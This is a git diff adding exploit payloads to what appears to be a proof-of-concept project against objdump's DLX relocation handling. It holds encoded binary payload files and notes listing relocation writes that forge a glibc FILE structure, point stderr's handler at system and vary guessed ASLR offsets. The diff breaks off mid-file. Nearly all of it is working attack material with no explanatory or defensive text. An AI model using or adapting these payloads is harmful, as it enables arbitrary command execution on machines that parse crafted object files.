diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..a4ae6166a84e2aed66c5ee871a79d35c7804bfb7 GIT binary patch literal 1280 zcmd5*%}QHA7(F-lYK-+iRjU5W zcW|jbfuP$$-#|g(_I&pzxtWEy^n;o6o%5Z{%$)X=2m9S6=YyCI#m|*|&YdL@Z ziX`eQ-glK)_kf+^(H{UO<#{(HppHB-3DgTt0ZGvhfd=vqk3dTB31}32<`8@Vnuzvi zpjogFXp!Gt0IfFp8PF#BInXZp9nc~AJ&+dt0r*J$whic{?o0w*)SW4yTlDY1r$lgd zJ>d=ZhR7{n2`(1Vks{yU>wHmHRpcS+WorTUpk3x?@=b^`;Cs>j)>xu?NhoVK%qi9leDcTf$E`6@7 zL!V2Z%lDTl7f;H_Y!wT~+nc)wKTF6Q758emKHV?>C?KQDM*;4HS$M{`fb^J*=$*^U zm!66u%99l0{Wwm}H&ThHmZrk~$81=+Cd!a?{Cg%ga7bSW55wYG))h$|2V33uOK%Q^ boFHMZaN6+GV2bw5O0lZjf0$2Kd2sgseLR01 literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.notes new file mode 100644 index 0000000..eff03e0 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.notes 
@@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..1b682a906e8579deaa1680782783307efb821573 GIT binary patch literal 1280 zcmd5*T}vB56g`{W7-OqOqqfn44+<6nv9nQ=5~ZbLEwo^v4~6<5hQ<%DMw|$Wf`7q3 z;gj?~^s((P2(jV?_OIe3vpPV&Y33!``WL~ z_}{0@2T-1vpvH`_Tl_E(f!N0&m zqCE!m3O)h)L)3rffMM!R4H%*B%ma@^e*-*D z1+6QD9UKjjNB$$YS>ku$N&Kg1x8Qjm(HRW5!#v3|Xit7k)O!qnui@vtag*@p4gZMY zFBo<9tKMlMT4S4(W2;4G%30iZHhjZ zK3Ddk&!x}h`zy5?hb@#oH|htQYumdUO_cT FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..8f5ab73c550552a01b1a4903ce864a89a5e4d211 GIT binary patch literal 1280 zcmd5*%Ss$U6g@rNI*yO1Gtu}6xQL)2jHw=U+^bf ziT{vg%ohl{75oDQh4$Qj*;5P2G8d}OJ@=luRek5yueopYR?0$b*7^ngM8JOVb3^{# zk2Gpy?SJK1w}74D)$af&<9XL5poTm(0n`dk0%?htfjaVrM<65k1k?*Ya|ylxjYPW} zXcGJke30Lr1I;%1DbOPEGoV%CH$Yb6w?Izfcfd!+|F!^aj5`xRJLAqI@JZr}Ku0QQ zU1!+At`K?TJH}#(|Ai;QLuW=kopKE5)A`Wv3?e+BZDfExe+ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.notes new file mode 100644 index 0000000..3d99c7f --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.notes 
@@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..7c5ed7091b8c1afe535eb3d5e2fff048344eaee5 GIT binary patch literal 1280 zcmd5*%Ss$U6g@rNI*yO1Gtu}6xQL)2jHw=U+^bf ziT{vg%ohl{7XLs&p*^=>_S8bM%!R6R&%I}ERo}VwYwp{;m9h|pQb zBaPZv`(HWMEnsJO^*g}Hc;0mhs3A{H0JVaXKw9EuppLxZ5y%KW0ri5Hzuyf>Z``kbL}H}suG zp8cvizsJabG4g%oLAh>x{{cfkXy^;2+56=8jT(CPyXySuWxsq}f7Z}182Tl0>1))_ zW%^SLodAJzktk`tmvJ~ z%a@soEb`L~BiB&o)^W*P2oKF-E$cT)4Hrk<*UM}U dgq$E|uW;M&-C&E(ElBb$ZeP-$dgH;}Ujg*rfE)k- literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.notes new file mode 100644 index 0000000..7850157 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.notes 
@@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..4c4baf7179fc6ad2ad3f015828f37e020eacbb59 GIT binary patch literal 1280 zcmd5*+e%wO6kR9h#27F2l4^}D^r3=+5IZN)L{t<+Ewo^v4~6zY6ypW7hD-_-h5mv+ z;gk3eeXRY0KzuFq4-^!RYoD7Z^HBQO4Kr)6y;t_k+1c}b<=v{4vJji~>70HdVE^%R zC4Zkl1|6~XzjCY=U}t&tYrx5R-qjJ1CQr=)9fI>fM&dP~lf3%|$O_&9U4nO9g7-iV z(S8o}3cdiI$nVa8KAZdm=$H5@Fd*?JFevdBkdyc|@Radi{lF08&KxkzxHAttllU88 zBo(wSA9ipwL>~DUW3j~l!jt$>lw0sTkLU~r+@YW388pW(6ZtMf-)rc3Z`>vHIYU2e z=<`ON{c1b^rICMS5E1DLqKExv5o83&bC|8+tsbFyBqsoc8*Y}R}b2_K0a)0ZlRzX^#J!mFTCTwfXtYz z=$*^Umzjzz@-qx1=dnW0HxgTv%Q3?F$5NR2Nt7jZ{5}&qxnwSchi0*s^@AkM#ZmY5 gGMkejCy3eaxqbHCV2jQzO7byoU(jE8 FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..5a4487645ca42b4c0a02c00574d47d3b8dc92022 GIT binary patch literal 1280 zcmd5*O)n%-6g|~dwDwIK--!sxNF;4uHG?1{1Pc-p3xdQD?ISTG@p=+MGV>E=&vsVg z2e7jA6C|uBc7A|GIk!H#%Zr7jo7_70oO|l!)vNn{Pt8qR2@8d=R{pV$3HGDk>-V2M zNTRgh{ZK_>1h7*;Via&vo_Dnlln6fqN(Ik>r0Cy)GV+QgASJjAlnbsh1=oN|qJ08X z37!Jg^4=ey#wNc9YDIql>O{W<>Zv;;K$^NU3N%o^=IMMA{S0Un{Tyf#eF$hy1V`5r z09r$A3-N8>VzK|i9q^;*wBUIj(Wwu(!#d8Bxa+=*^~()^mEo@?e~$UnhQHD9w;26) zqu*ilyNv$lr%o!x{r4LFKEt0qnD`&}4;p^{hgaYKZC*~Jxc;Q!pE3Ni-gtPEMv-C2oJ;JTGkCo36rDl??Gm> dH{=8fdx4KtzYHGHp0d&`>h=Zeu_6!l{sK7nd(r>^ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.notes new file mode 100644 index 0000000..e625fea --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.notes 
@@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..c3bd2df1c4c09739d4983471647c1456ff0066c2 GIT binary patch literal 1280 zcmd5*O-oxr6g@BRX^fxIRBKcaX`zA;J1?;+NvROjMGFzSsMJENm{y^!kcnVv!TtpI zy6vj?19a78e?p;dh3@9of7bX`Z;fBSoC9HMD!Ejq38?1 zXd<|}YycPwaXiG^fs4id3wOXn(P_c+JfbrcaEE!EC-L|3X{_FD`1=fhn*2KE&lvs@ z!=E+k6GnZ~s6R65Pp+n@wDvz^_-74&ey@BPKi|CJ=YMEB|BH&aTkDq%|El4CNiO#q z-DiclM8sbQw8_~=egt*>6k0*M(0S+r^c?gv=y~V`=tY*K%(|jM(V=Kj^eCDXU5YkE zpG%)B>(J-Y=kopK8nuH4a@)17{g2h%FCX@htJglYasBmk=UcU5H6j7d}5bsC!HI5=vtd?QU{>KuB1mBB4WF7yWiCrAh7sA7^xR&*sq=SR4 i?(ac*b0*{j344vxhMxvgw5PljTe|&=`STVJ_I?9@&3w@S literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.notes new file mode 100644 index 0000000..db97a8a --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.notes 
@@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..d255eda80ebcaa47c8b95eb314b5da20d1a0aa2f GIT binary patch literal 1280 zcmd5*O-oxr6g@BRX^fxIRBKcaX`zA;J1?;+NvROjMGFzSsMJENm{y^!kcnVv!TtpI zy6vj?19a78e?pAhD;q6pY2AW;IGl;@pQfezuvK&RjdkQ99r=pyfV1Ed7kfo{PK4#9Uo zFVX%6^a*|k`sKSHz<^Eu4@irC0St=%2Na91rn!;9{}=!X5BXbXxE{kLU~q++iN)N&J0$8mo63{yxK>CclpPGlqY} z@Mn$sgi)U~>W_^2ldCBzt^Lm!{#nDH-z#6n&o^)Q`5)TO|Dq!9*7{|`ziRkjlFPkD z_gP^s5%JdnZF2UJA3a|a8Tz~!Cc)x|5Zqx(Z3A1pIcLC`! z8PPkJmoGgPMU*Eg#QTwbjibmEt7Vw8|FOg&!S~`1S;xO;Vi$+>h43&eu4Vlu>EK|i i`+JbyoC!HW!d~OF;ithA?I|zCmTv!I{=CJ5z25+W7kttH literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.notes new file mode 100644 index 0000000..60bc8f9 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.notes 
@@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..5cea9885154c7f6912971e78c1ca9a357ed45c4b GIT binary patch literal 1280 zcmd5*%Ss$U6g@rN+A~I@&P0td5Q2h&Fj_sMPSB8mL>CDd$RgqhK5%@1nlLqjLBV`N z_Rcn|kPpz6OFuzKwt~BSKo*^I`!UlNS-A8<)w$=~(?wPFt&=zJ=B$*3Mp#SVnI{DM zCa4vIc?2$68{T`Bq^1Eo1EgjEC*%8PD?p3zQ=nC_4!EMP0%`IGAAyYEBG4vS<`7&4 z+KKiN&>?sXJe2Rg0-ZMbFQ7~G-$1wMmq3=fGY#aZJ2Su|>gT+j9??&MUeW77pXepv zaVosJ{t)ma!hs0?4_qwqU$_GvicSl@?-QMD$Q|ZM?&50bXQJL__&W@L7x~|WKWF%R z4S&B;e`?g98TCPv3oW?Lilyi_jC$lh9MpCFmC{Ntty;gQ7#xqUcdHDY_JG ziaw7%Pu8K&qtD~}%hxK0HRLxc>jzsaJNuiTkgryDZ*l!)ueP?1yslM4+>Wwnk9Ps- zF&XhYmzOU+6-S)A6q5bOzQ(uMl&IyHv;Xm$LxS%m7_v@q&%`u`^o8&!EUsl;khE~H j)q_1qZ;nQsAYs4fR1VT`iuY8IVpF$&Fn`(P;okoNf*E|$ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.notes new file mode 100644 index 0000000..51c11b5 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.notes 
@@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c 